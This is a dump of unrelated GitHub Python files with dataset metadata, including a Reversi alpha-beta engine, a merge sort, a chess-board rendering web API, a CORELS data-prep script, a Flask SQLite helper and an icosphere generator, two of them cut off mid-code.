cv2.findContours(t2,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n #cv2.drawContours(img, contours, -1, (0,255,0), 3)\n\n for i in xrange(len(contours)):\n cnt = contours[i]\n if cv2.contourArea(cnt) > 1000 and cv2.contourArea(cnt) < 15000:\n cv2.drawContours(img, [cnt],-1, [255, 255, 255])\n '''\n if cv2.contourArea(cnt) > 0 and cv2.contourArea(cnt) < 10000000:\n hull = cv2.convexHull(cnt,returnPoints = False)\n defects = cv2.convexityDefects(cnt,hull)\n\n for i in range(defects.shape[0]):\n s,e,f,d = defects[i,0]\n start = tuple(cnt[s][0])\n end = tuple(cnt[e][0])\n cv2.line(img,start,end,[0,255,0],1)\n '''\n\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"vampcoder/A-star-planning","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"34587531096","text":"def merge_sort(lis):\n l = len(lis)\n if l <= 1:\n return lis\n left_len = l/2\n left, right = merge_sort(lis[:left_len]), merge_sort(lis[left_len:])\n return merge(left, right)\n\ndef merge(left, right):\n left_len, right_len = len(left), len(right)\n to_return = []\n l, r = 0, 0\n while l < left_len and r < right_len:\n left_, right_ = left[l], right[r]\n if left_ < right_:\n to_return.append(left_)\n l += 1\n else:\n to_return.append(right_)\n r += 1\n to_add = right[r:] or left[l:]\n to_return += to_add\n return to_return\n\nimport random\nlis = range(1000000)\nrandom.shuffle(lis)\nmerge_sort(lis)\n","repo_name":"thisiswei/random-learning","sub_path":"algorithm/wee1k.py","file_name":"wee1k.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"6007873493","text":"import 
time\nimport math as m\nimport numpy as np\nfrom collections import Counter\nimport copy\nfrom bitarray import bitarray\nfrom bitarray import util as btutil\nimport argparse\nfrom zobrist import ZobristTable\nfrom problem64 import Color, Move, Board, Stack\n\nclass Game:\n    def __init__(self):\n        self.initialize_game()\n    \n    def initialize_game(self):\n        self.board = Board(0,0)\n        self.board[27] = Color.BLACK\n        self.board[36] = Color.BLACK\n        self.board[28] = Color.WHITE\n        self.board[35] = Color.WHITE\n\n        self.shallow_depth = 4 #default for shallow depth move ordering\n        self.counter = self.board.count()\n        self.pruned = 0\n        self.evals = 0\n        self.symm = 0\n        self.moves = 0\n        self.current_player = Color.BLACK\n        self.flipstack = Stack(3000)\n        self.zobrist = ZobristTable()\n        self.zobrist.calc_keys()\n        self.current_hash = self.zobrist.hash_board(self.board)\n        \n        # positional weight table used by eval_structure()\n        self.structure = np.array([[16, -4, 4, 2, 2, 4, -4, 16],\n                    [-4, -12, -2, -2 ,-2, -2, -12,-4],\n                    [4, -2, 4, 2, 2, 4, -2, 4],\n                    [2, -2, 2, 0, 0, 2, -2, 2],\n                    [2, -2, 2, 0, 0, 2, -2, 2],\n                    [4, -2, 4, 2, 2, 4, -2, 4],\n                    [-4, -12, -2, -2 ,-2, -2, -12,-4],\n                    [16, -4, 4, 2, 2, 4, -4, 16]]).flatten()\n    \n\n    #TODO: Implement actual test\n    def move_valid(self, move, player):\n        if self.board[move.y*8+move.x] != Color.NONE:\n            return False\n        return True\n\n    def count(self):\n        return self.board.count()\n    \n\n    def draw_board(self):\n        print(self.board)\n\n    def scan_move(self, i, j, player):\n        retval = []\n        for yinc in range(-1,2):\n            for xinc in range(-1,2):\n                if xinc == 0 and yinc == 0:\n                    continue\n                x = j\n                y = i\n\n                nmoves = 0\n\n                while True:\n                    x += xinc\n                    y += yinc\n                    if x>=0 and y>=0 and x<=7 and y<=7:\n                        if self.board[y*8+x] == -player:\n                            nmoves += 1\n                        else:\n                            break\n                    else:\n                        nmoves = 0\n                        break\n\n                if nmoves > 0 and self.board[y*8+x] == Color.NONE:\n                    if x < 0 or y < 0:\n                        print(\"boink\")\n                    else:\n                        retval.append(Move(x,y))\n\n        return retval\n    \n    #TODO: this function is too slow\n    def next_moves(self,player):\n        next_moves = []\n\n        if self.board.outside_square() == False:\n            rmin = 1\n            rmax = 7\n        else:\n            rmin = 0\n            rmax = 8\n        \n        for i in range(rmin,rmax):\n            for j in range(rmin,rmax):\n                if self.board[i*8+j] == player:\n                    m = self.scan_move(i,j,player)\n                    next_moves += m\n        used = set()\n        unique = [x for x in next_moves if x not in used and (used.add(x) or True)]\n        return unique\n\n    def make_move(self,player,move):\n        flipped = 0\n        i = move.y\n        j = move.x\n\n        self.board[i*8+j] = player\n        self.current_hash ^= int(self.zobrist.key_table[i*8+j][player])\n\n        for yinc in range(-1,2):\n            for xinc in range(-1,2):\n                if xinc == 0 and yinc ==0:\n                    continue\n                y = i\n                x = j\n                nmoves = 0\n\n                while True:\n                    x += xinc\n                    y += yinc\n                    if x>=0 and y>=0 and x<=7 and y<=7:\n                        if self.board[y*8+x] == -player:\n                            nmoves += 1\n                        else:\n                            break\n                    else:\n                        nmoves = 0\n                        break\n\n                if nmoves > 0 and self.board[y*8+x] == player:\n                    x -= xinc\n                    y -= yinc\n                    while self.board[y*8+x] == -player:\n                        self.flipstack.push(y,x)\n                        flipped += 1\n                        self.board.flip(y*8+x)\n                        x -= xinc\n                        y -= yinc\n        self.counter[player] += flipped + 1\n        self.counter[-player] -= flipped\n\n        self.moves += 1\n        return flipped\n    \n    def undo_move(self,move,flipped):\n        i = move.y\n        j = move.x\n\n        player = self.board[i*8+j]\n        self.counter[player] -= flipped + 1\n        self.counter[-player] += flipped\n        self.board[i*8+j] = Color.NONE\n        self.current_hash ^= int(self.zobrist.key_table[i*8+j][player]) #TODO: zobrist.get_key()\n\n        for i in range(0,flipped):\n            (y,x) = self.flipstack.pop()\n            self.board.flip(y*8+x)\n    \n    def eval_structure(self,c):\n        structure_sum =
0\n outside_square = self.board.outside_square()\n mult = 1\n\n if outside_square:\n b = self.board.copy()\n b.wstate &= ~b.square_mask\n b.bstate &= ~b.square_mask\n mult = 3\n else:\n b = self.board\n\n \n x = btutil.int2ba(b.wstate,length=64)\n y = btutil.int2ba(b.bstate,length=64)\n \n structure_sum = np.matmul(y.tolist(),self.structure)\n structure_sum -= np.matmul(x.tolist(),self.structure)\n\n\n structure_sum *= mult*c\n return structure_sum\n\n def eval(self):\n self.evals += 1\n\n omoves = self.next_moves(-self.current_player)\n moves = self.next_moves(self.current_player)\n\n M = (len(moves)-len(omoves))*2\n S = self.eval_structure(self.current_player)\n A = self.counter[self.current_player] - self.counter[-self.current_player]\n \n n = self.counter[Color.WHITE]+self.counter[Color.BLACK]\n z = 0.035\n W = m.exp(-n*z)\n\n score = (M+S)*W + A*(1-W)\n return score\n \n def sort_initial_moves(self,moves):\n sorted_moves = []\n alpha = -m.inf\n beta = m.inf\n max_value = alpha\n value = 0\n for mov in moves:\n s = self.make_move(self.current_player,mov)\n value = self.alphabeta_min(self.shallow_depth-1,max_value,beta)\n self.undo_move(mov,s)\n sorted_moves.append((value,mov))\n sorted_moves.sort(reverse=True)\n return sorted_moves\n\n def alphabeta_init(self,depth):\n moves = self.next_moves(self.current_player)\n if len(moves) == 1:\n return moves[0]\n\n retmov = None\n alpha = -m.inf\n beta = m.inf\n max_value = alpha\n value = 0\n sorted_moves = self.sort_initial_moves(moves)\n for item in sorted_moves:\n mov = item[1]\n s = self.make_move(self.current_player,mov)\n value = self.alphabeta_min(depth-1,max_value,beta)\n self.undo_move(mov,s)\n if value > max_value:\n max_value = value\n retmov = mov\n if max_value >= beta:\n self.pruned += 1\n break\n #samesies but use the alphabetically lower version\n if value == max_value and mov and mov < retmov:\n retmov = mov\n return (value,retmov)\n\n def alphabeta_max(self, depth, alpha, beta):\n moves = self.next_moves(self.current_player)\n\n if len(moves) == 0 or depth == 0:\n return self.eval()\n \n max_value = alpha\n for mov in moves:\n s = self.make_move(self.current_player,mov)\n value = self.alphabeta_min(depth-1,max_value,beta)\n self.undo_move(mov,s)\n if value > max_value:\n max_value = value\n if max_value >= beta:\n self.pruned += 1\n break \n return max_value\n \n def alphabeta_min(self, depth, alpha, beta):\n moves = self.next_moves(-self.current_player)\n if len(moves) == 0 or depth == 0:\n return self.eval()\n\n min_value = beta\n for mov in moves:\n s = self.make_move(-self.current_player,mov)\n value = self.alphabeta_max(depth-1,alpha,min_value)\n self.undo_move(mov,s)\n if value < min_value:\n min_value = value\n if min_value <= alpha:\n self.pruned += 1\n break\n return min_value\n\ndef test_symmetry():\n b = Board(0,0)\n b[27] = Color.BLACK\n b[28] = Color.BLACK\n b[63] = Color.WHITE\n b[56] = Color.WHITE\n #b[62] = Color.WHITE\n #b[56] = Color.WHITE\n #b = g.game_state.copy()\n #print(\"x symmetry\")\n #print(b)\n assert(b.wstate == b.bit_reverse_8(b.wstate))\n assert(b.bstate == b.bit_reverse_8(b.bstate))\n b = Board(0,0)\n b[0] = Color.WHITE\n b[56] = Color.WHITE\n #print(\"y symmetry\")\n #print (b)\n assert(b.wstate == b.flip_vertically(b.wstate))\n assert(b.bstate == b.flip_vertically(b.bstate))\n #print(b)\n b = Game().board\n #print(\"180 degree rotation\")\n #print (b)\n assert(b.wstate == b.bit_reverse_64(b.wstate))\n assert(b.bstate == b.bit_reverse_64(b.bstate))\n print(\"Symmetry test successful.\")\n\ndef 
test_eval():\n g = Game()\n assert(g.eval() == 0)\n b = g.board\n b[2*8+5] = Color.WHITE\n b[3*8+5] = Color.BLACK\n b[4*8+2] = Color.BLACK\n b[5*8+2] = Color.WHITE\n assert(g.eval_structure(Color.WHITE) == 4)\n assert(g.eval_structure(Color.BLACK) == -4)\n b[0] = Color.BLACK\n assert(g.eval_structure(Color.BLACK)==48)\n assert(g.eval_structure(Color.WHITE)==-48)\n g = Game()\n assert(len(g.next_moves(Color.BLACK))==4)\n g.make_move(Color.BLACK,Move(4,2))\n np.testing.assert_almost_equal(g.eval(),2.160542979230793)\n print(\"Evaluation Test successful\")\n\n\n\n \n \ndef main():\n parser = argparse.ArgumentParser(description='CLI based reversi game with AI player')\n parser.add_argument('--test', action='store_true')\n parser.add_argument('-v','--verbose', action='store_true')\n\n args = parser.parse_args()\n if args.test:\n test_symmetry()\n test_eval()\n else:\n run()\n \n \n\n\ndef run():\n g = Game()\n b = g.board\n b[2*8+5] = Color.WHITE\n b[3*8+5] = Color.BLACK\n b[4*8+2] = Color.BLACK\n b[5*8+2] = Color.WHITE\n print(b)\n g.zobrist.load_from_file('zobrist.npz')\n hashed_board = g.zobrist.hash_board(b)\n g.current_hash = hashed_board\n \n\n g.shallow_depth = 4\n depth = 7\n\n passing = 0\n moves = []\n\n passing = 0\n\n while True:\n try:\n cev = g.evals\n cmv = g.moves\n cpr = g.pruned\n sym = g.symm\n t1 = time.time()\n \n (value,mv) = g.alphabeta_init(depth)\n\n t1 = time.time() - t1\n print(\"Time: {}s\".format(t1))\n cev = g.evals - cev\n cmv = g.moves - cmv\n cpr = g.pruned - cpr\n sym = g.symm - sym\n print(\"Evals: {} Evals/s: {} Moves: {} Pruned: {} Symmetry: {}\".format(cev,cev/t1,cmv,cpr,sym))\n\n if mv != None:\n g.make_move(g.current_player,mv)\n moves.append(mv)\n g.draw_board()\n print(\"Color: {} Move: {} Value: {:0.9f}\".format(Color.format(g.current_player),mv,value))\n passing = 0\n else:\n passing += 1\n print(\"Color: {}\".format(Color.format(g.current_player)))\n if passing == 2:\n break\n\n g.current_player = -g.current_player\n except KeyboardInterrupt:\n #g.zobrist.save_to_file('zobrist.npz')\n break\n except: #make crashes traceable\n for mov in moves:\n print(mov,end=\"\")\n print()\n print(b.wstate)\n print(b.bstate)\n \n c = g.count()\n if c[Color.WHITE] > c[Color.BLACK]:\n print(\"WHITE won!\")\n else:\n print(\"BLACK won!\")\n\n for mov in moves:\n print(mov,end=\"\")\n print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"roggenbrot42/problem64","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36849562852","text":"import sys\nimport ctypes\n\nfrom predict_pb2 import (\n ArrayDataType,\n ArrayShape,\n ArrayProto,\n PredictRequest,\n PredictResponse,\n)\n\nmodel_config = '{ \\\n \"omp_num_threads\": 4, \\\n \"kmp_blocktime\": 0, \\\n \"feature_store_type\": \"memory\", \\\n \"serialize_protocol\": \"protobuf\", \\\n \"inter_op_parallelism_threads\": 10, \\\n \"intra_op_parallelism_threads\": 10, \\\n \"init_timeout_minutes\": 1, \\\n \"signature_name\": \"serving_default\", \\\n \"read_thread_num\": 3, \\\n \"update_thread_num\": 2, \\\n \"model_store_type\": \"local\", \\\n \"checkpoint_dir\": \"/tmp/checkpoint/\", \\\n \"savedmodel_dir\": \"/tmp/saved_model/\" \\\n}'\n\nif __name__ == \"__main__\":\n # Load shared library\n processor = ctypes.cdll.LoadLibrary(\"libserving_processor.so\")\n model_entry = \"\"\n state = ctypes.c_int(0)\n state_ptr = ctypes.pointer(state)\n processor.initialize.argtypes 
= [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_void_p]\n processor.initialize.restype = ctypes.POINTER(ctypes.c_char)\n model = processor.initialize(\n ctypes.create_string_buffer(model_entry.encode(\"utf-8\")),\n ctypes.create_string_buffer(model_config.encode(\"utf-8\")),\n state_ptr,\n )\n if state_ptr.contents == -1:\n print(\"initialize error\", file=sys.stderr)\n\n # input type: float\n dtype = ArrayDataType.Value(\"DT_FLOAT\")\n # input shape: [1, 1]\n array_shape = ArrayShape()\n array_shape.dim.append(1)\n array_shape.dim.append(1)\n # input array\n input = ArrayProto()\n input.float_val.append(1.0)\n input.dtype = dtype\n input.array_shape.CopyFrom(array_shape)\n # PredictRequest\n req = PredictRequest()\n req.signature_name = \"serving_default\"\n req.output_filter.append(\"y:0\")\n req.inputs[\"x:0\"].CopyFrom(input)\n buffer = req.SerializeToString()\n size = req.ByteSize()\n\n # do process\n output = ctypes.c_void_p(0)\n output_ptr = ctypes.pointer(output)\n output_size = ctypes.c_int(0)\n output_size_ptr = ctypes.pointer(output_size)\n processor.process.argtypes = [\n ctypes.c_void_p,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_void_p),\n ctypes.c_void_p,\n ]\n processor.process.restype = ctypes.c_int\n state = processor.process(model, buffer, size, output_ptr, output_size_ptr)\n\n # parse response\n output_string = ctypes.string_at(output, output_size)\n resp = PredictResponse()\n resp.ParseFromString(output_string)\n print(f\"process returned state: {state}, response: {dict(resp.outputs.items())}\")\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"serving/sdk/python/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"71876461207","text":"import os\nimport csv\nimport pycorels\nimport numpy as np\n\nbase_all_out_file = \"data/all.out\"\nexpanded_all_out_file = \"data/expanded.out\"\ntrain_out_file = \"data/train.out\"\ntest_out_file = \"data/test.out\"\n#eout_file = data_dir + \"expanded.out\"\n\ntrain_dir = \"data/train/\"\ntest_dir = \"data/test/\"\ncsv_dir = \"data/clean_csv/\"\n\nmin_accuracy = 0.95\n\nverbosity = \"log,silent\"\n\nmaxnodes = [100, 1000, 10000, 100000, 1000000]\ncardinality = 2\nmin_support = 0.001\nc = 0.01\ngates = 2\nmap_type = 0\n\ntrain_test_split = 120\n\ngenerate_bits = [1, 18, 286, 352, 420]\n\n\ndef csplit(rules, indices):\n\n indices_or_sections = []\n out = []\n numsections = 0\n\n if not isinstance(indices, list):\n nsamples = len(rules[0][1])\n for i in range(1, indices):\n indices_or_sections.append(int(round(i * nsamples / indices)))\n\n numsections = indices;\n else:\n indices_or_sections = indices\n numsections = len(indices_or_sections) + 1\n\n for i in range(numsections):\n out.append([])\n\n #print(indices_or_sections)\n\n i = 0\n for rule in rules:\n splitlist = np.split(rule[1], indices_or_sections)\n\n j = 0\n for j in range(len(splitlist)):\n out[j].append((rule[0], splitlist[j]))\n\n return out\n\nall_labels_dict = {}\ntrain_labels_dict = {}\ntest_labels_dict = {}\n\nout_written = False\nfor csv_file_path in os.listdir(csv_dir):\n p1_bit = csv_file_path[5:-4]\n\n if not out_written:\n outfp = open(base_all_out_file, \"w\")\n\n csvfp = open(csv_dir + csv_file_path, \"r\")\n\n reader = csv.DictReader(csvfp, delimiter=',')\n\n rules = {}\n label1 = []\n label0 = []\n\n sample_id = 0\n for row in reader:\n for features,sample_bit in row.items():\n if features[:6] == \"p1_bit\":\n 
label1.append(sample_bit)\n            elif not out_written:\n                if features not in rules:\n                    rules[features] = []\n\n                rules[features].append(sample_bit)\n\n            sample_id = sample_id + 1\n\n\n    if not out_written:\n        for features,captured_vector in rules.items():\n            line = \"{\" + features + \"} \"\n            for bit in captured_vector:\n                line += str(bit) + \" \"\n\n            line += \"\\n\"\n\n            outfp.write(line)\n\n        out_written = True\n\n    for bit in label1:\n        if bit == \"1\":\n            label0.append(0)\n        else:\n            label0.append(1)\n\n    all_labels_dict[p1_bit] =[(\"{\" + p1_bit + \"=0}\", np.array(label0)), (\"{\" + p1_bit + \"=1}\", np.array(label1))]\n    train_labels_dict[p1_bit],test_labels_dict[p1_bit] = csplit(all_labels_dict[p1_bit], [train_test_split])\n\n    pycorels.tofile(train_labels_dict[p1_bit], train_dir + p1_bit + \".label\")\n    pycorels.tofile(test_labels_dict[p1_bit], test_dir + p1_bit + \".label\")\n\n\n    #print(labels_dict)\n\n#if not os.path.isfile(expanded_all_out_file):\nexpanded_all_out_list = pycorels.fastmine(base_all_out_file, cardinality, min_support, gates)\npycorels.tofile(expanded_all_out_list, expanded_all_out_file)\n\n#if not os.path.isfile(train_out_file) or not os.path.isfile(test_out_file):\ntrain_out_list,test_out_list = csplit(expanded_all_out_list, [train_test_split])\n\n#print(train_out_list)\n\npycorels.tofile(train_out_list, train_out_file)\npycorels.tofile(test_out_list, test_out_file)\n\n\n\nfor p1_bit,labels in train_labels_dict.items():\n#    if int(p1_bit[6:]) not in generate_bits:\n#        continue\n\n    log = train_dir + p1_bit + \".log\"\n    opt = train_dir + p1_bit + \".opt\"\n    #if not os.path.isfile(opt):\n    for nnodes in maxnodes:\n        a = pycorels.run(train_out_file, labels, c = c, opt_file=opt, max_num_nodes=nnodes, map_type = map_type, log_file=log, verbosity=verbosity)\n\n        if a > min_accuracy:\n            print(\"Accuracy: \" + str(a))\n            continue\n\n        if a < min_accuracy:\n            print(\"Accuracy: \" + str(a))\n","repo_name":"fingoldin/reactions","sub_path":"reactions/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11790480412","text":"# Ask the user to enter the numbers separated by spaces\r\nl = input(\"Enter the numbers separated by spaces: \")\r\n# Convert l into a list of real numbers; split is used to separate the individual numbers\r\nnumeros = [float(i) for i in l.split()]\r\n# Compute the sum of the elements in the numeros list\r\nsuma = sum(numeros)\r\n# Compute the number of elements in the numeros list\r\nn = len(numeros)\r\n# Compute the average\r\npromedio = suma / n\r\n\r\n# Print the result\r\nprint(\"The average of \" + str(numeros) + \" is: \" + str(promedio))\r\n","repo_name":"Marifer206/ARREGLOS","sub_path":"RETO 10/PUNTO #1 RETO 10.py","file_name":"PUNTO #1 RETO 10.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"365265015","text":"#530.
Minimum Absolute Difference in BST\n\"\"\"\nGiven a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def getMinimumDifference(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n vals = []\n \n self.getMinDiffHelper(root, vals)\n \n minVal = vals[1] - vals[0]\n \n for i in range(2,len(vals)):\n temp = vals[i] - vals[i-1]\n if temp < minVal:\n minVal = temp\n \n return minVal\n \n def getMinDiffHelper(self, root, vals):\n \n if root == None:\n return\n \n self.getMinDiffHelper(root.left, vals)\n vals.append(root.val)\n self.getMinDiffHelper(root.right, vals)\n \n","repo_name":"victorplusc/Algorithms","sub_path":"Leetcode/530. Minimum Absolute Difference in BST.py","file_name":"530. Minimum Absolute Difference in BST.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28987973204","text":"from aiohttp import web\nimport aiohttp\nimport json\nimport requests\nimport argparse\nimport cairosvg\n\nimport tensorflow as tf\nfrom tensorflow.keras import models\nimport numpy as np\n\nfrom recognize import perform_recognition\nfrom generate_tiles import generate_tiles_from_random_chessboard\nfrom generate_chessboards import generate_random_chessboards, generate_random_chessboard\nfrom server import Service\n\nfrom constants import TILES_DIR, NN_MODEL_PATH, FEN_CHARS, USE_GRAYSCALE, DETECT_CORNERS\n\nservice = Service()\n\n\n# board.svg?fen=5r1k/1b4pp/3pB1N1/p2Pq2Q/PpP5/6PK/8/8&lastMove=f4g6&check=h8&arrows=Ge6g8,Bh7&squares=a3,c3\nasync def render_svg(request):\n svg_data = service.make_svg(request)\n print(type(svg_data))\n return aiohttp.web.Response(text=svg_data, content_type=\"image/svg+xml\")\n\n\n# board.png?fen=5r1k/1b4pp/3pB1N1/p2Pq2Q/PpP5/6PK/8/8&lastMove=f4g6&check=h8&arrows=Ge6g8,Bh7&squares=a3,c3\nasync def render_png(request):\n svg_data = service.make_svg(request)\n png_data = cairosvg.svg2png(bytestring=svg_data)\n with open(\"output.png\", \"wb\") as file:\n file.write(png_data)\n\n return aiohttp.web.Response(body=png_data, content_type=\"image/png\")\n\n\nasync def recognize_chessboard(request):\n chessboard_image_path = \"./chessboard.png\"\n model = models.load_model(NN_MODEL_PATH)\n\n mock_args = argparse.Namespace()\n mock_args.quiet = False\n mock_args.debug = False\n mock_args.image_path = chessboard_image_path\n\n print(\"recognizer\")\n print(mock_args)\n\n response = perform_recognition(mock_args, chessboard_image_path)\n return web.Response(text=response)\n\n\nasync def generate_tiles_from_chessboards(request):\n zip_file_path = generate_tiles_from_random_chessboard()\n\n response = web.FileResponse(zip_file_path)\n response.headers[\"Content-Disposition\"] = 'attachment: filename=\"example.zip'\n return response\n\n\nasync def generate_chessboard(request):\n filepath = generate_random_chessboard(\"http://www.fen-to-image.com/image/32/{}\")\n return web.FileResponse(filepath, headers={\"Content-Type\": \"image/png\"})\n \n\napp = web.Application()\napp.router.add_get(\"/recognize\", recognize_chessboard)\napp.router.add_get(\"/generate-chessboard\", generate_chessboard)\napp.router.add_get(\n \"/generate-tiles-from-random-chessboard\", generate_tiles_from_chessboards\n)\napp.router.add_get(\"/board.svg\", 
render_svg)\napp.router.add_get(\"/board.png\", render_png)\n\nweb.run_app(app)\n","repo_name":"vishalv87/rpz_web_api","sub_path":"app_server.py","file_name":"app_server.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41911403015","text":"#!/usr/bin/env python\n\nfrom distutils.version import LooseVersion, StrictVersion\nimport json\nimport sys\n\nbuilds = json.load(sys.stdin)\n\npackages = dict()\nrecent = dict()\n\nfor b in builds.values():\n if ',' in b['VERSION']: continue\n if not b['NAME'] in packages:\n packages[b['NAME']] = dict()\n packages[b['NAME']][b['VERSION']] = b['HASH']\n\nfor pkg,vers in packages.items():\n for v, h in vers.items():\n if pkg in recent:\n if LooseVersion(v) > LooseVersion(recent[pkg][0]):\n recent[pkg] = (v, h)\n else:\n recent[pkg] = (v, h)\n\njson.dump(recent, sys.stdout, indent=2)\n","repo_name":"nhazekam/hep-portable-packages","sub_path":"simulation/recent.py","file_name":"recent.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24238156820","text":"import sqlite3\nimport time\nimport math\nimport re\nfrom flask import url_for\n\n\nclass FDataBase:\n def __init__(self, db):\n self.__db = db\n self.__cur = db.cursor()\n\n def get_menu(self):\n sql = 'SELECT * FROM mainmenu'\n try:\n self.__cur.execute(sql)\n res = self.__cur.fetchall()\n if res:\n return res\n except IOError:\n print('Ошибка чтения из базы данных')\n return []\n\n def add_product(self, title, text, price, url):\n try:\n self.__cur.execute('SELECT COUNT() as \"count\" FROM products WHERE url LIKE ?', (url,))\n res = self.__cur.fetchone()\n if res['count'] > 0:\n print('Товар с таким url уже существует')\n return False\n base = url_for('static', filename='images')\n text = re.sub(r\"(?P]*src=)(?P[\\\"'])(?P.+?)(?P=quote)>\", r\"\\g\" + base +\n r\"/\\g>\", text)\n tm = math.floor(time.time())\n self.__cur.execute('INSERT INTO products VALUES(NULL, ?, ?, ?, ?, ?)', (title, text, price, url, tm))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка добавления товара в базу данных' + str(e))\n return False\n return True\n\n def get_product(self, alias):\n try:\n self.__cur.execute(f'SELECT title, text, price FROM products WHERE url LIKE \"{alias}\" LIMIT 1')\n res = self.__cur.fetchone()\n if res:\n return res\n\n except sqlite3.Error as e:\n print('Ошибка добавления продукта в базу данных' + str(e))\n\n return False, False\n\n def get_post_anonce(self):\n try:\n self.__cur.execute(f'SELECT id, title, text, price, url FROM products ORDER BY time DESC')\n res = self.__cur.fetchall()\n if res:\n return res\n except sqlite3.Error as e:\n print('Ошибка добавления продукта в базу данных' + str(e))\n\n return []\n","repo_name":"NeDimaN/Python123","sub_path":"HomeWork_51/hw_FDataBase.py","file_name":"hw_FDataBase.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22759299812","text":"import sys\nimport os\n\nimport trimesh\nfrom trimesh import creation\n\nimport scipy.io\n\nimport random\nimport argparse\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nimport mpl_toolkits.mplot3d\n\nsys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))\n# import get_param as parameters\n\nfrom utils.sphere_grid import Icosphere\n\n\ndef 
main(ico_depth):\n print(\"Generate and Save Icosphere grids ... depth: \", ico_depth)\n # Get parameters\n # project_dir = '/root/Projects/DL_based_SSL_project/DL_based_SSL'\n\n # saving_dir = os.path.join(project_dir, 'utils')\n\n # saving_np_dir = os.path.join(saving_dir, 'icosphere_vertices_d%d' % ico_dpeth)\n # saving_mat_dir = os.path.join(saving_dir, 'icosphere_vertices_d%d.mat' % ico_dpeth)\n\n # icosphere = trimesh.creation.icosphere(ico_dpeth)\n # icosphere_vertices = np.array(icosphere.vertices)\n\n # np.save(saving_np_dir, icosphere_vertices)\n # scipy.io.savemat(saving_mat_dir, {'icosphere_vertices': icosphere_vertices})\n\n # icosphere, face = utils.icosphere.icosphere(ico_dpeth)\n # icosphere_vertices = np.array(icosphere.vertices)\n\n icosphere_node = Icosphere(ico_depth)\n\n ############################################################################\n ### Steering\n steer_neigh_list = [[] for i in range(ico_depth + 1)]\n child_point_list = []\n for idx in range(len(icosphere_node.steer_vertice_list[0])):\n child_point_list.append(idx)\n\n for tmp_depth in range(ico_depth + 1):\n vertice = icosphere_node.steer_vertice_list[tmp_depth]\n\n steering_vertex_idx = random.choice(child_point_list)\n # For debugging\n if tmp_depth == 0:\n steering_vertex_idx = 8\n\n neigh_indice = vertice[steering_vertex_idx].neighbor_indice\n\n steer_neigh_list[tmp_depth].append(steering_vertex_idx)\n for neigh_idx in neigh_indice:\n steer_neigh_list[tmp_depth].append(neigh_idx)\n\n print(\"[Depth \", tmp_depth, \"]\")\n print(\" Child, \", child_point_list)\n print(\" .. Steering idx, \", steering_vertex_idx)\n print(\" .. Neigh, \", neigh_indice)\n print(\" .. Neigh, \", steer_neigh_list[tmp_depth])\n\n\n\n child_vertice = vertice[steering_vertex_idx].child_indice\n child_point_list.clear()\n for child_vertex in child_vertice:\n child_point_list.append(child_vertex)\n ############################################################################\n print(\"**************************\")\n\n\n fig = plt.figure()\n for tmp_depth in range(ico_depth + 1):\n\n vertices = icosphere_node.steer_vertice_list[tmp_depth]\n faces = icosphere_node.steer_faces_list[tmp_depth]\n faces_np = np.array(faces)\n vertices_np = np.array([vertex.get_pos() for vertex in vertices])\n\n # basic mesh color, divided in 20 groups (one for each original face)\n jet = matplotlib.cm.tab20(np.linspace(0,1,20))\n jet = np.tile(jet[:,:3], (1, faces_np.shape[0]//20))\n jet = jet.reshape(faces_np.shape[0], 1, 3)\n\n # computing face shading intensity based on face normals\n face_normals = np.cross(vertices_np[faces_np[:,1]]-vertices_np[faces_np[:,0]],\n vertices_np[faces_np[:,2]]-vertices_np[faces_np[:,0]])\n\n face_normals /= np.sqrt(np.sum(face_normals**2, axis=1, keepdims=True))\n light_source = matplotlib.colors.LightSource(azdeg=60, altdeg=30)\n intensity = light_source.shade_normals(face_normals)\n\n # blending face colors and face shading intensity\n rgb = light_source.blend_hsv(rgb=jet, intensity=intensity.reshape(-1,1,1))\n\n # adding alpha value, may be left out\n # rgba = np.concatenate((rgb, 0.9*np.ones(shape=(rgb.shape[0],1,1))), axis=2)\n rgba = np.concatenate((rgb, 0.3*np.ones(shape=(rgb.shape[0],1,1))), axis=2)\n\n # creating mesh with given face colors\n poly = mpl_toolkits.mplot3d.art3d.Poly3DCollection(vertices_np[faces_np])\n poly.set_facecolor(rgba.reshape(-1,4))\n 